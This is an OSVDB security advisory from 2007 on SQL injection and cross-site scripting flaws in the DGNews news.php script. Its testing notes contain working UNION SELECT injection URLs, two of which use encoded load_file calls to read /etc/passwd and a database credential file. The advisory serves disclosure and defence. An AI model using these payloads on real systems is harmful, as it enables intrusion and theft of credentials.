DGNews news.php Multiple Variable SQL Injection

2007-05-28T00:00:00
ID OSVDB:34227
Type osvdb
Reporter laurent gaffie(laurent.gaffie@gmail.com), Jesper Jurcenoks(jesper.jurcenoks@netvigilance.com)
Modified 2007-05-28T00:00:00

Description

Vulnerability Description

DGNews contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the news.php script not properly sanitizing user-supplied input to the 'catid' or 'newsid' variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. Additionally, the crafted input is sent back to the browser without filtering allowing for cross site scripting attacks. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

DGNews contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the news.php script not properly sanitizing user-supplied input to the 'catid' or 'newsid' variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. Additionally, the crafted input is sent back to the browser without filtering allowing for cross site scripting attacks. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[target]/[PRODUCT-DIRECTORY]/news.php?go=newslist&catid=' UNION SELECT 1,site_title FROM news_config WHERE '1

/news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7%20from%20news_comment/*

/news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61 646D696E2F636F6E6E2E706870),4,5,6,7%20from%20news_comment/*

References:

Vendor URL: http://www.diangemilang.com/dgscripts.php Secunia Advisory ID:25438 Related OSVDB ID: 34226 Related OSVDB ID: 34228 Other Advisory URL: http://www.netvigilance.com/advisory0022 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0508.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-05/0411.html Keyword: netVigilance Security Advisory #22 ISS X-Force ID: 34539 FrSIRT Advisory: ADV-2007-1981 CVE-2007-0693 Bugtraq ID: 24201